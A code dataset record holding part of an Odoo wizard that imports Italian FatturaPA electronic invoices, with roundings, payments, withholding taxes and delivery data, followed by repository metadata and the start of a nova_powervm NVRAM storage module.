numline in DdtDataLine.RiferimentoNumeroLinea:\n invoice_lines = invoice_line_model.search(\n [\n (\"move_id\", \"=\", invoice_id),\n (\"sequence\", \"=\", int(numline)),\n ]\n )\n invoice_lineid = False\n if invoice_lines:\n invoice_lineid = invoice_lines[0].id\n DdTModel.create(\n {\n \"name\": DdtDataLine.NumeroDDT or \"\",\n \"date\": DdtDataLine.DataDDT or False,\n \"invoice_id\": invoice_id,\n \"invoice_line_id\": invoice_lineid,\n }\n )\n\n def set_art73(self, FatturaBody, invoice_data):\n if FatturaBody.DatiGenerali.DatiGeneraliDocumento.Art73:\n invoice_data[\"art73\"] = True\n\n def set_roundings(self, FatturaBody, invoice):\n rounding = 0.0\n if FatturaBody.DatiBeniServizi.DatiRiepilogo:\n for summary in FatturaBody.DatiBeniServizi.DatiRiepilogo:\n rounding += float(summary.Arrotondamento or 0.0)\n if FatturaBody.DatiGenerali.DatiGeneraliDocumento:\n summary = FatturaBody.DatiGenerali.DatiGeneraliDocumento\n rounding += float(summary.Arrotondamento or 0.0)\n\n if rounding:\n arrotondamenti_attivi_account_id = (\n self.env.company.arrotondamenti_attivi_account_id\n )\n if not arrotondamenti_attivi_account_id:\n raise UserError(\n _(\"Round up account is not set \" \"in Accounting Settings\")\n )\n\n arrotondamenti_passivi_account_id = (\n self.env.company.arrotondamenti_passivi_account_id\n )\n if not arrotondamenti_passivi_account_id:\n raise UserError(\n _(\"Round down account is not set \" \"in Accounting Settings\")\n )\n\n arrotondamenti_tax_id = self.env.company.arrotondamenti_tax_id\n if not arrotondamenti_tax_id:\n self.log_inconsistency(_(\"Round up and down tax is not set\"))\n\n line_sequence = max(invoice.invoice_line_ids.mapped(\"sequence\"), default=1)\n line_vals = []\n for summary in FatturaBody.DatiBeniServizi.DatiRiepilogo:\n # XXX fallisce cattivo se non trova l'imposta Arrotondamento\n to_round = float(summary.Arrotondamento or 0.0)\n if to_round != 0.0:\n account_taxes = self.get_account_taxes(\n summary.AliquotaIVA, summary.Natura\n )\n arrotondamenti_account_id = (\n arrotondamenti_passivi_account_id.id\n if to_round > 0.0\n else arrotondamenti_attivi_account_id.id\n )\n invoice_line_tax_id = (\n account_taxes[0].id\n if account_taxes\n else arrotondamenti_tax_id.id\n )\n name = _(\"Rounding down\") if to_round > 0.0 else _(\"Rounding up\")\n line_sequence += 1\n upd_vals = {\n \"sequence\": line_sequence,\n \"move_id\": invoice.id,\n \"name\": name,\n \"account_id\": arrotondamenti_account_id,\n \"price_unit\": to_round,\n \"tax_ids\": [(6, 0, [invoice_line_tax_id])],\n }\n # Valutare se in caso di importazione senza rounding sia meglio\n # lavorare su debito e credito invece di\n # mettere una tassa sul valore !!\n # if to_round<0:\n # upd_vals[\"debit\"]= abs(to_round)\n # else:\n # upd_vals[\"credit\"]= abs(to_round)\n line_vals.append(upd_vals)\n\n if line_vals:\n self.env[\"account.move.line\"].with_context(\n check_move_validity=False\n ).create(line_vals)\n\n def set_efatt_rounding(self, FatturaBody, invoice):\n invoice_line_model = self.env[\"account.move.line\"]\n invoice_line_ids = []\n if FatturaBody.DatiGenerali.DatiGeneraliDocumento.Arrotondamento:\n invoice.efatt_rounding = float(\n FatturaBody.DatiGenerali.DatiGeneraliDocumento.Arrotondamento\n )\n if invoice.efatt_rounding != 0:\n if invoice.efatt_rounding > 0:\n arrotondamenti_account_id = (\n self.env.company.arrotondamenti_passivi_account_id\n )\n if not arrotondamenti_account_id:\n raise UserError(\n _(\"Round down account is not set \" \"in Accounting Settings\")\n )\n name = _(\"Rounding down\")\n else:\n arrotondamenti_account_id = (\n self.env.company.arrotondamenti_attivi_account_id\n )\n if not arrotondamenti_account_id:\n raise UserError(\n _(\"Round up account is not set \" \"in Accounting Settings\")\n )\n name = _(\"Rounding up\")\n upd_vals = {\n \"move_id\": invoice.id,\n \"name\": name,\n \"account_id\": arrotondamenti_account_id.id,\n \"price_unit\": invoice.efatt_rounding,\n \"quantity\": 1,\n \"tax_ids\": [fields.Command.set([])],\n }\n self.create_and_get_line_id(\n invoice_line_ids, invoice_line_model, upd_vals\n )\n return invoice_line_ids\n\n def set_activity_progress(self, FatturaBody, invoice):\n invoice_id = invoice.id\n SalDatas = FatturaBody.DatiGenerali.DatiSAL\n if SalDatas:\n SalModel = self.env[\"fatturapa.activity.progress\"]\n for SalDataLine in SalDatas:\n SalModel.create(\n {\n \"fatturapa_activity_progress\": SalDataLine.RiferimentoFase or 0,\n \"invoice_id\": invoice_id,\n }\n )\n\n def _get_last_due_date(self, DatiPagamento):\n dates = []\n for PaymentLine in DatiPagamento or []:\n details = PaymentLine.DettaglioPagamento\n if details:\n for dline in details:\n if dline.DataScadenzaPagamento:\n dates.append(fields.Date.to_date(dline.DataScadenzaPagamento))\n dates.sort(reverse=True)\n return dates\n\n def set_payments_data(self, FatturaBody, invoice, partner_id):\n invoice_id = invoice.id\n PaymentsData = FatturaBody.DatiPagamento\n partner = self.env[\"res.partner\"].browse(partner_id)\n if not partner.property_supplier_payment_term_id:\n due_dates = self._get_last_due_date(FatturaBody.DatiPagamento)\n if due_dates:\n self.env[\"account.move\"].browse(\n invoice_id\n ).invoice_date_due = due_dates[0]\n if PaymentsData:\n PaymentDataModel = self.env[\"fatturapa.payment.data\"]\n PaymentTermsModel = self.env[\"fatturapa.payment_term\"]\n for PaymentLine in PaymentsData:\n cond = PaymentLine.CondizioniPagamento or False\n if not cond:\n raise UserError(_(\"Payment method code not found in document.\"))\n terms = PaymentTermsModel.search([(\"code\", \"=\", cond)])\n if not terms:\n raise UserError(_(\"Payment method code %s is incorrect.\") % cond)\n else:\n term_id = terms[0].id\n PayDataId = PaymentDataModel.create(\n {\"payment_terms\": term_id, \"invoice_id\": invoice_id}\n ).id\n self._createPaymentsLine(PayDataId, PaymentLine, partner_id, invoice)\n\n def set_withholding_tax(self, FatturaBody, invoice_data):\n Withholdings = FatturaBody.DatiGenerali.DatiGeneraliDocumento.DatiRitenuta\n if not Withholdings:\n return None\n\n withholding_tax_model = self.env[\"withholding.tax\"]\n found_withholding_taxes = withholding_tax_model.browse()\n e_withholding_taxes_values = []\n for Withholding in Withholdings:\n payment_reason_code = Withholding.CausalePagamento\n withholding_taxes = withholding_tax_model.search(\n [(\"payment_reason_id.code\", \"=\", payment_reason_code)],\n )\n if not withholding_taxes:\n raise UserError(\n _(\n \"The bill contains withholding tax with \"\n \"payment reason %s, \"\n \"but such a tax is not found in your system. Please \"\n \"set it.\",\n payment_reason_code,\n )\n )\n\n withholding_tax_amount = Withholding.AliquotaRitenuta\n e_withholding_tax_type = Withholding.TipoRitenuta\n withholding_tax_type = WT_CODES_MAPPING[e_withholding_tax_type]\n for withholding_tax in withholding_taxes:\n if (\n withholding_tax.tax == float(withholding_tax_amount)\n and withholding_tax_type == withholding_tax.wt_types\n ):\n found_withholding_taxes |= withholding_tax\n break\n else:\n raise UserError(\n _(\n \"No withholding tax found with document payment \"\n \"reason %(reason)s rate %(rate)s and type %(type)s.\",\n reason=payment_reason_code,\n rate=withholding_tax_amount,\n type=withholding_tax_type,\n )\n )\n\n e_withholding_tax_values = {\n \"name\": e_withholding_tax_type,\n \"amount\": Withholding.ImportoRitenuta,\n }\n e_withholding_taxes_values.append(e_withholding_tax_values)\n\n invoice_data[\"ftpa_withholding_ids\"] = [\n (0, 0, withholding_tax_values)\n for withholding_tax_values in e_withholding_taxes_values\n ]\n return found_withholding_taxes\n\n def set_welfares_fund(self, FatturaBody, credit_account_id, invoice, wt_founds):\n invoice_line_model = self.env[\"account.move.line\"]\n invoice_line_ids = []\n if self.e_invoice_detail_level == \"2\":\n\n Welfares = (\n FatturaBody.DatiGenerali.DatiGeneraliDocumento.DatiCassaPrevidenziale\n )\n if Welfares:\n WelfareFundLineModel = self.env[\"welfare.fund.data.line\"]\n for welfareLine in Welfares:\n WalfarLineVals = self._prepareWelfareLine(invoice.id, welfareLine)\n WelfareFundLineModel.create(WalfarLineVals)\n\n if welfareLine.TipoCassa == \"TC07\":\n continue\n\n line_vals = self._prepare_generic_line_data(welfareLine)\n line_vals.update(\n {\n \"name\": _(\"Welfare Fund: %s\") % welfareLine.TipoCassa,\n \"price_unit\": float(welfareLine.ImportoContributoCassa),\n \"move_id\": invoice.id,\n \"account_id\": credit_account_id,\n \"quantity\": 1,\n }\n )\n if welfareLine.Ritenuta:\n if not wt_founds:\n raise UserError(\n _(\n \"Welfare Fund data %s has withholding tax but no \"\n \"withholding tax was found in the system.\"\n )\n % welfareLine.TipoCassa\n )\n line_vals[\"invoice_line_tax_wt_ids\"] = [\n (6, 0, [wt.id for wt in wt_founds])\n ]\n if self.env.company.cassa_previdenziale_product_id:\n cassa_previdenziale_product = (\n self.env.company.cassa_previdenziale_product_id\n )\n line_vals[\"product_id\"] = cassa_previdenziale_product.id\n line_vals[\"name\"] = cassa_previdenziale_product.name\n self.adjust_accounting_data(\n cassa_previdenziale_product, line_vals\n )\n self.create_and_get_line_id(\n invoice_line_ids, invoice_line_model, line_vals\n )\n return invoice_line_ids\n\n def _convert_datetime(self, dtstring):\n ret = False\n try:\n dt = datetime.strptime(dtstring, \"%Y-%m-%dT%H:%M:%S\")\n if dt:\n ret = dt.strftime(\"%Y-%m-%d %H:%M:%S\")\n except (TypeError, ValueError): # pylint: disable=except-pass\n pass\n return ret\n\n def set_delivery_data(self, FatturaBody, invoice):\n Delivery = FatturaBody.DatiGenerali.DatiTrasporto\n if Delivery:\n delivery_id = self.getCarrirerPartner(Delivery)\n delivery_dict = {\n \"carrier_id\": delivery_id,\n \"transport_vehicle\": Delivery.MezzoTrasporto or \"\",\n \"transport_reason\": Delivery.CausaleTrasporto or \"\",\n \"number_items\": Delivery.NumeroColli or 0,\n \"description\": Delivery.Descrizione or \"\",\n \"unit_weight\": Delivery.UnitaMisuraPeso or 0.0,\n \"gross_weight\": Delivery.PesoLordo or 0.0,\n \"net_weight\": Delivery.PesoNetto or 0.0,\n \"pickup_datetime\": self._convert_datetime(Delivery.DataOraRitiro)\n or False,\n \"transport_date\": Delivery.DataInizioTrasporto or False,\n \"delivery_datetime\": self._convert_datetime(Delivery.DataOraConsegna)\n or False,\n \"delivery_address\": \"\",\n \"ftpa_incoterms\": Delivery.TipoResa,\n }\n\n if Delivery.IndirizzoResa:\n delivery_dict[\"delivery_address\"] = \"{}, {}\\n{} - {}\\n{} {}\".format(\n Delivery.IndirizzoResa.Indirizzo or \"\",\n Delivery.IndirizzoResa.NumeroCivico or \"\",\n Delivery.IndirizzoResa.CAP or \"\",\n Delivery.IndirizzoResa.Comune or \"\",\n Delivery.IndirizzoResa.Provincia or \"\",\n Delivery.IndirizzoResa.Nazione or \"\",\n )\n invoice.write(delivery_dict)\n\n def set_summary_data(self, FatturaBody, invoice):\n invoice_id = invoice.id\n Summary_datas = FatturaBody.DatiBeniServizi.DatiRiepilogo\n summary_data_model = self.env[\"fatturapa.summary.data\"]\n if Summary_datas:\n for summary in Summary_datas:\n summary_line = {\n \"tax_rate\": summary.AliquotaIVA or 0.0,\n \"non_taxable_nature\": summary.Natura or False,\n \"incidental_charges\": summary.SpeseAccessorie or 0.0,\n \"rounding\": summary.Arrotondamento or 0.0,\n \"amount_untaxed\": summary.ImponibileImporto or 0.0,\n \"amount_tax\": summary.Imposta or 0.0,\n \"payability\": summary.EsigibilitaIVA or False,\n \"law_reference\": summary.RiferimentoNormativo or \"\",\n \"invoice_id\": invoice_id,\n }\n summary_data_model.create(summary_line)\n\n def set_e_invoice_lines(self, FatturaBody, invoice_data):\n e_invoice_lines = self.env[\"einvoice.line\"].browse()\n for line in FatturaBody.DatiBeniServizi.DettaglioLinee:\n e_invoice_lines |= self.create_e_invoice_line(line)\n if e_invoice_lines:\n invoice_data[\"e_invoice_line_ids\"] = [(6, 0, e_invoice_lines.ids)]\n\n def _set_invoice_lines(\n self, product, invoice_line_data, invoice_lines, invoice_line_model\n ):\n\n if product:\n invoice_line_data[\"product_id\"] = product.id\n self.adjust_accounting_data(product, invoice_line_data)\n self.create_and_get_line_id(\n invoice_lines, invoice_line_model, invoice_line_data\n )\n\n # move_id\n # account_id\n def set_invoice_line_ids(\n self, FatturaBody, credit_account_id, partner, wt_founds, invoice\n ):\n invoice_lines = []\n invoice_line_model = self.env[\"account.move.line\"]\n if self.e_invoice_detail_level == \"1\":\n for nline, line in enumerate(FatturaBody.DatiBeniServizi.DatiRiepilogo):\n invoice_line_data = self._prepareInvoiceLineAliquota(\n credit_account_id, line, nline\n )\n invoice_line_data[\"move_id\"] = invoice.id\n\n product = partner.e_invoice_default_product_id\n self._set_invoice_lines(\n product, invoice_line_data, invoice_lines, invoice_line_model\n )\n\n elif self.e_invoice_detail_level == \"2\":\n for line in FatturaBody.DatiBeniServizi.DettaglioLinee:\n invoice_line_data = self._prepareInvoiceLine(\n credit_account_id, line, wt_founds\n )\n invoice_line_data[\"move_id\"] = invoice.id\n\n product = self.get_line_product(line, partner)\n self._set_invoice_lines(\n product, invoice_line_data, invoice_lines, invoice_line_model\n )\n return invoice_lines\n\n def check_invoice_amount(self, invoice, FatturaElettronicaBody):\n dgd = FatturaElettronicaBody.DatiGenerali.DatiGeneraliDocumento\n if dgd.ScontoMaggiorazione and dgd.ImportoTotaleDocumento:\n # assuming that, if someone uses\n # DatiGeneraliDocumento.ScontoMaggiorazione, also fills\n # DatiGeneraliDocumento.ImportoTotaleDocumento\n ImportoTotaleDocumento = float(dgd.ImportoTotaleDocumento)\n if not float_is_zero(\n invoice.amount_total - ImportoTotaleDocumento, precision_digits=2\n ):\n self.log_inconsistency(\n _(\n \"Bill total %(amount_total)s is different \"\n \"from document total amount %(document_total_amount)s\"\n )\n % {\n \"amount_total\": invoice.amount_total,\n \"document_total_amount\": ImportoTotaleDocumento,\n }\n )\n else:\n # else, we can only check DatiRiepilogo if\n # DatiGeneraliDocumento.ScontoMaggiorazione is not present,\n # because otherwise DatiRiepilogo and odoo invoice total would\n # differ\n amount_untaxed = invoice.compute_xml_amount_untaxed(FatturaElettronicaBody)\n if not float_is_zero(\n invoice.amount_untaxed - amount_untaxed, precision_digits=2\n ):\n self.log_inconsistency(\n _(\n \"Computed amount untaxed %(amount_untaxed)s is \"\n \"different from summary data %(summary_data)s\"\n )\n % {\n \"amount_untaxed\": invoice.amount_untaxed,\n \"summary_data\": amount_untaxed,\n }\n )\n\n def get_invoice_obj(self, fatturapa_attachment):\n xml_string = fatturapa_attachment.ir_attachment_id.get_xml_string()\n return efattura.CreateFromDocument(xml_string)\n\n def create_and_get_line_id(self, invoice_line_ids, invoice_line_model, upd_vals):\n invoice_line_id = (\n invoice_line_model.with_context(check_move_validity=False)\n .create(upd_vals)\n .id\n )\n invoice_line_ids.append(invoice_line_id)\n\n def _set_decimal_precision(self, precision_name, field_name):\n precision = self.env[\"decimal.precision\"].search(\n [(\"name\", \"=\", precision_name)], limit=1\n )\n different_precisions = original_precision = None\n if precision:\n precision_id = precision.id\n original_precision = precision.digits\n different_precisions = self[field_name] != original_precision\n if different_precisions:\n with registry(self.env.cr.dbname).cursor() as new_cr:\n # We need a new env (and cursor) because 'digits' property of Float\n # fields is retrieved with a new LazyCursor,\n # see class Float at odoo.fields,\n # so we need to write (commit) to DB in order to make the new\n # precision available\n new_env = api.Environment(new_cr, self.env.uid, self.env.context)\n new_precision = new_env[\"decimal.precision\"].browse(precision_id)\n new_precision.sudo().write({\"digits\": self[field_name]})\n new_cr.commit()\n return precision, different_precisions, original_precision\n\n def _restore_original_precision(self, precision, original_precision):\n with registry(self.env.cr.dbname).cursor() as new_cr:\n new_env = api.Environment(new_cr, self.env.uid, self.env.context)\n new_price_precision = new_env[\"decimal.precision\"].browse(precision.id)\n new_price_precision.sudo().write({\"digits\": original_precision})\n new_cr.commit()\n\n def _get_invoice_partner_id(self, fatt):\n cedentePrestatore = fatt.FatturaElettronicaHeader.CedentePrestatore\n partner_id = self.getCedPrest(cedentePrestatore)\n return partner_id\n\n def importFatturaPA(self):\n self.ensure_one()\n\n (\n price_precision,\n different_price_precisions,\n original_price_precision,\n ) = self._set_decimal_precision(\"Product Price\", \"price_decimal_digits\")\n (\n qty_precision,\n different_qty_precisions,\n original_qty_precision,\n ) = self._set_decimal_precision(\n \"Product Unit of Measure\", \"quantity_decimal_digits\"\n )\n (\n discount_precision,\n different_discount_precisions,\n original_discount_precision,\n ) = self._set_decimal_precision(\"Discount\", \"discount_decimal_digits\")\n\n new_invoices = []\n # convert to dict in order to be able to modify context\n fatturapa_attachments = self._get_selected_records()\n self.env.context = dict(self.env.context)\n for fatturapa_attachment in fatturapa_attachments:\n self.reset_inconsistencies()\n self._check_attachment(fatturapa_attachment)\n\n fatt = self.get_invoice_obj(fatturapa_attachment)\n cedentePrestatore = fatt.FatturaElettronicaHeader.CedentePrestatore\n # 1.2\n partner_id = self._get_invoice_partner_id(fatt)\n # 1.3\n TaxRappresentative = fatt.FatturaElettronicaHeader.RappresentanteFiscale\n # 1.5\n Intermediary = (\n fatt.FatturaElettronicaHeader.TerzoIntermediarioOSoggettoEmittente\n )\n\n generic_inconsistencies = \"\"\n existing_inconsistencies = self.get_inconsistencies()\n if existing_inconsistencies:\n generic_inconsistencies = existing_inconsistencies + \"\\n\\n\"\n\n xmlproblems = getattr(fatt, \"_xmldoctor\", None)\n if xmlproblems: # None or []\n generic_inconsistencies += \"\\n\".join(xmlproblems) + \"\\n\\n\"\n\n # 2\n for fattura in fatt.FatturaElettronicaBody:\n\n # reset inconsistencies\n self.reset_inconsistencies()\n\n invoice = self.invoiceCreate(\n fatt, fatturapa_attachment, fattura, partner_id\n )\n\n self.set_StabileOrganizzazione(cedentePrestatore, invoice)\n if TaxRappresentative:\n tax_partner_id = self.getPartnerBase(\n TaxRappresentative.DatiAnagrafici\n )\n invoice.write({\"tax_representative_id\": tax_partner_id})\n if Intermediary:\n Intermediary_id = self.getPartnerBase(Intermediary.DatiAnagrafici)\n invoice.write({\"intermediary\": Intermediary_id})\n new_invoices.append(invoice.id)\n self.check_invoice_amount(invoice, fattura)\n\n invoice.set_einvoice_data(fattura)\n\n existing_inconsistencies = self.get_inconsistencies()\n if existing_inconsistencies:\n invoice_inconsistencies = existing_inconsistencies\n else:\n invoice_inconsistencies = \"\"\n invoice.inconsistencies = (\n generic_inconsistencies + invoice_inconsistencies\n )\n\n if price_precision and different_price_precisions:\n self._restore_original_precision(price_precision, original_price_precision)\n if qty_precision and different_qty_precisions:\n self._restore_original_precision(qty_precision, original_qty_precision)\n if discount_precision and different_discount_precisions:\n self._restore_original_precision(\n discount_precision, original_discount_precision\n )\n\n return {\n \"view_type\": \"form\",\n \"name\": \"Electronic Bills\",\n \"view_mode\": \"tree,form\",\n \"res_model\": \"account.move\",\n \"type\": \"ir.actions.act_window\",\n \"domain\": [(\"id\", \"in\", new_invoices)],\n }\n", "repo_name": "OCA/l10n-italy", "sub_path": "l10n_it_fatturapa_in/wizard/wizard_import_fatturapa.py", "file_name": "wizard_import_fatturapa.py", "file_ext": "py", "file_size_in_byte": 81066, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 115, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "odoo.models.TransientModel", "line_number": 28, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 28, "usage_type": "name"}, {"api_name": "odoo.fields.Selection", "line_number": 32, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 32, "usage_type": "name"}, {"api_name": "odoo.fields.Integer", "line_number": 48, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 48, "usage_type": "name"}, {"api_name": "odoo.fields.Integer", "line_number": 56, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 56, "usage_type": "name"}, {"api_name": "odoo.fields.Integer", "line_number": 61, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 61, "usage_type": "name"}, {"api_name": "odoo.exceptions.UserError", "line_number": 81, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 81, "usage_type": "call"}, {"api_name": "odoo.api.model", "line_number": 86, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 86, "usage_type": "name"}, {"api_name": "odoo.tools.frozendict", "line_number": 139, "usage_type": "call"}, {"api_name": "odoo.tools.frozendict", "line_number": 167, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 176, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 190, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 204, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 222, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 274, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 297, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 298, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 350, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 360, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 372, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 373, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 386, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 408, "usage_type": "call"}, {"api_name": "odoo.fields.Command.set", "line_number": 450, "usage_type": "call"}, {"api_name": "odoo.fields.Command", "line_number": 450, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 450, "usage_type": "name"}, {"api_name": "odoo.fields.Command.clear", "line_number": 452, "usage_type": "call"}, {"api_name": "odoo.fields.Command", "line_number": 452, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 452, "usage_type": "name"}, {"api_name": "odoo.fields.first", "line_number": 466, "usage_type": "call"}, {"api_name": "odoo.osv.expression.AND", "line_number": 480, "usage_type": "call"}, {"api_name": "odoo.osv.expression", "line_number": 480, "usage_type": "name"}, {"api_name": "odoo.fields.first", "line_number": 492, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 495, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 504, "usage_type": "call"}, {"api_name": "odoo.osv.expression.AND", "line_number": 518, "usage_type": "call"}, {"api_name": "odoo.osv.expression", "line_number": 518, "usage_type": "name"}, {"api_name": "odoo.fields.first", "line_number": 532, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 535, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 546, "usage_type": "call"}, {"api_name": "odoo.fields.first", "line_number": 599, "usage_type": "call"}, {"api_name": "odoo.fields.Command", "line_number": 619, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 619, "usage_type": "name"}, {"api_name": "odoo.tools.translate._", "line_number": 625, "usage_type": "call"}, {"api_name": "odoo.fields.Command.set", "line_number": 651, "usage_type": "call"}, {"api_name": "odoo.fields.Command", "line_number": 651, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 651, "usage_type": "name"}, {"api_name": "odoo.fields.Command.clear", "line_number": 653, "usage_type": "call"}, {"api_name": "odoo.fields.Command", "line_number": 653, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 653, "usage_type": "name"}, {"api_name": "odoo.tools.translate._", "line_number": 766, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 773, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 773, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 787, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 788, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 840, "usage_type": "call"}, {"api_name": "odoo.fields.Command.clear", "line_number": 850, "usage_type": "call"}, {"api_name": "odoo.fields.Command", "line_number": 850, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 850, "usage_type": "name"}, {"api_name": "odoo.exceptions.UserError", "line_number": 868, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 869, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 905, "usage_type": "call"}, {"api_name": "odoo.addons.base_iban.models.res_partner_bank.pretty_iban", "line_number": 923, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 930, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 950, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1010, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1011, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1097, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1098, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1120, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1121, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1140, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1141, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 1184, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1184, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 1328, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1328, "usage_type": "name"}, {"api_name": "odoo.fields.Date.context_today", "line_number": 1334, "usage_type": "call"}, {"api_name": "odoo.fields.Date", "line_number": 1334, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 1334, "usage_type": "name"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1425, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1426, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1433, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1434, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1439, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1460, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1497, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1498, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1500, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1506, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1507, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1509, "usage_type": "call"}, {"api_name": "odoo.fields.Command.set", "line_number": 1516, "usage_type": "call"}, {"api_name": "odoo.fields.Command", "line_number": 1516, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 1516, "usage_type": "name"}, {"api_name": "odoo.fields.Date.to_date", "line_number": 1543, "usage_type": "call"}, {"api_name": "odoo.fields.Date", "line_number": 1543, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 1543, "usage_type": "name"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1563, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1563, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1566, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1566, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1588, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1589, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1609, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1610, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1651, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1660, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1661, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 1687, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1687, "usage_type": "name"}, {"api_name": "odoo.tools.float_is_zero", "line_number": 1803, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1807, "usage_type": "call"}, {"api_name": "odoo.tools.float_is_zero", "line_number": 1822, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1826, "usage_type": "call"}, {"api_name": "odoo.registry", "line_number": 1858, "usage_type": "call"}, {"api_name": "odoo.api.Environment", "line_number": 1864, "usage_type": "call"}, {"api_name": "odoo.api", "line_number": 1864, "usage_type": "name"}, {"api_name": "odoo.registry", "line_number": 1871, "usage_type": "call"}, {"api_name": "odoo.api.Environment", "line_number": 1872, "usage_type": "call"}, {"api_name": "odoo.api", "line_number": 1872, "usage_type": "name"}]}
+{"seq_id": "10594990609", "text": "import abc\nfrom nova import exception as nex\nimport six\n\nfrom nova_powervm.virt.powervm.i18n import _\n\n\nclass NVRAMUploadException(nex.NovaException):\n msg_fmt = _(\"The NVRAM could not be stored for instance %(instance)s. \"\n \"Reason: %(reason)s\")\n\n\nclass NVRAMDownloadException(nex.NovaException):\n msg_fmt = _(\"The NVRAM could not be fetched for instance %(instance)s. \"\n \"Reason: %(reason)s\")\n\n\nclass NVRAMDeleteException(nex.NovaException):\n msg_fmt = _(\"The NVRAM could not be deleted for instance %(instance)s. \"\n \"Reason: %(reason)s\")\n\n\nclass NVRAMConfigOptionNotSet(nex.NovaException):\n msg_fmt = _(\"The configuration option '%(option)s' must be set.\")\n\n\n@six.add_metaclass(abc.ABCMeta)\nclass NvramStore(object):\n\n @abc.abstractmethod\n def store(self, instance, data, force=True):\n \"\"\"Store the NVRAM into the storage service.\n\n :param instance: The nova instance object OR instance UUID.\n :param data: the NVRAM data base64 encoded string\n :param force: boolean whether an update should always be saved,\n otherwise, check to see if it's changed.\n \"\"\"\n\n @abc.abstractmethod\n def fetch(self, instance):\n \"\"\"Fetch the 